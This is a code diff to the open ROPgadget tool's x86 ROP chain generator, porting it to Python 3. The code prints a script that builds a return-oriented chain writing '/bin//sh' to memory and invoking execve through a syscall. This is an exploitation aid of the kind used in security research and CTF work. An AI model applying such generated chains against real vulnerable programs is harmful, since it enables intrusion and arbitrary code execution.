@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 ## -*- coding: utf-8 -*-
 ##
 ##  Jonathan Salwan - 2014-05-13
@@ -82,65 +82,65 @@ class ROPMakerX86(object):
             print("\n[-] Error - Can't find a writable section")
             return
 
-        print("\t#!/usr/bin/env python")
-        print("\t# execve generated by ROPgadget\n")
-        print("\tfrom struct import pack\n")
+        print("#!/usr/bin/env python3")
+        print("# execve generated by ROPgadget\n")
+        print("from struct import pack\n")
 
-        print("\t# Padding goes here")
-        print("\tp = ''\n")
+        print("# Padding goes here")
+        print("p = b''\n")
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (popDst["vaddr"], popDst["gadget"]))
-        print("\tp += pack('<I', 0x%08x) # @ .data" % dataAddr)
+        print("p += pack('<I', 0x%08x) # %s" % (popDst["vaddr"], popDst["gadget"]))
+        print("p += pack('<I', 0x%08x) # @ .data" % dataAddr)
         self.__padding(popDst, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (popSrc["vaddr"], popSrc["gadget"]))
-        print("\tp += '/bin'")
+        print("p += pack('<I', 0x%08x) # %s" % (popSrc["vaddr"], popSrc["gadget"]))
+        print("p += b'/bin'")
         self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr})  # Don't overwrite reg dst
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (write4where["vaddr"], write4where["gadget"]))
+        print("p += pack('<I', 0x%08x) # %s" % (write4where["vaddr"], write4where["gadget"]))
         self.__padding(write4where, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (popDst["vaddr"], popDst["gadget"]))
-        print("\tp += pack('<I', 0x%08x) # @ .data + 4" % (dataAddr + 4))
+        print("p += pack('<I', 0x%08x) # %s" % (popDst["vaddr"], popDst["gadget"]))
+        print("p += pack('<I', 0x%08x) # @ .data + 4" % (dataAddr + 4))
         self.__padding(popDst, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (popSrc["vaddr"], popSrc["gadget"]))
-        print("\tp += '//sh'")
+        print("p += pack('<I', 0x%08x) # %s" % (popSrc["vaddr"], popSrc["gadget"]))
+        print("p += b'//sh'")
         self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr + 4})  # Don't overwrite reg dst
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (write4where["vaddr"], write4where["gadget"]))
+        print("p += pack('<I', 0x%08x) # %s" % (write4where["vaddr"], write4where["gadget"]))
         self.__padding(write4where, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (popDst["vaddr"], popDst["gadget"]))
-        print("\tp += pack('<I', 0x%08x) # @ .data + 8" % (dataAddr + 8))
+        print("p += pack('<I', 0x%08x) # %s" % (popDst["vaddr"], popDst["gadget"]))
+        print("p += pack('<I', 0x%08x) # @ .data + 8" % (dataAddr + 8))
         self.__padding(popDst, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (xorSrc["vaddr"], xorSrc["gadget"]))
+        print("p += pack('<I', 0x%08x) # %s" % (xorSrc["vaddr"], xorSrc["gadget"]))
         self.__padding(xorSrc, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (write4where["vaddr"], write4where["gadget"]))
+        print("p += pack('<I', 0x%08x) # %s" % (write4where["vaddr"], write4where["gadget"]))
         self.__padding(write4where, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (popEbx["vaddr"], popEbx["gadget"]))
-        print("\tp += pack('<I', 0x%08x) # @ .data" % dataAddr)
+        print("p += pack('<I', 0x%08x) # %s" % (popEbx["vaddr"], popEbx["gadget"]))
+        print("p += pack('<I', 0x%08x) # @ .data" % dataAddr)
         self.__padding(popEbx, {})
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (popEcx["vaddr"], popEcx["gadget"]))
-        print("\tp += pack('<I', 0x%08x) # @ .data + 8" % (dataAddr + 8))
+        print("p += pack('<I', 0x%08x) # %s" % (popEcx["vaddr"], popEcx["gadget"]))
+        print("p += pack('<I', 0x%08x) # @ .data + 8" % (dataAddr + 8))
         self.__padding(popEcx, {"ebx": dataAddr})  # Don't overwrite ebx
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (popEdx["vaddr"], popEdx["gadget"]))
-        print("\tp += pack('<I', 0x%08x) # @ .data + 8" % (dataAddr + 8))
+        print("p += pack('<I', 0x%08x) # %s" % (popEdx["vaddr"], popEdx["gadget"]))
+        print("p += pack('<I', 0x%08x) # @ .data + 8" % (dataAddr + 8))
         self.__padding(popEdx, {"ebx": dataAddr, "ecx": dataAddr + 8})  # Don't overwrite ebx and ecx
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (xorEax["vaddr"], xorEax["gadget"]))
+        print("p += pack('<I', 0x%08x) # %s" % (xorEax["vaddr"], xorEax["gadget"]))
         self.__padding(xorEax, {"ebx": dataAddr, "ecx": dataAddr + 8})  # Don't overwrite ebx and ecx
 
         for _ in range(11):
-            print("\tp += pack('<I', 0x%08x) # %s" % (incEax["vaddr"], incEax["gadget"]))
+            print("p += pack('<I', 0x%08x) # %s" % (incEax["vaddr"], incEax["gadget"]))
             self.__padding(incEax, {"ebx": dataAddr, "ecx": dataAddr + 8})  # Don't overwrite ebx and ecx
 
-        print("\tp += pack('<I', 0x%08x) # %s" % (syscall["vaddr"], syscall["gadget"]))
+        print("p += pack('<I', 0x%08x) # %s" % (syscall["vaddr"], syscall["gadget"]))
 
     def __generate(self):
 
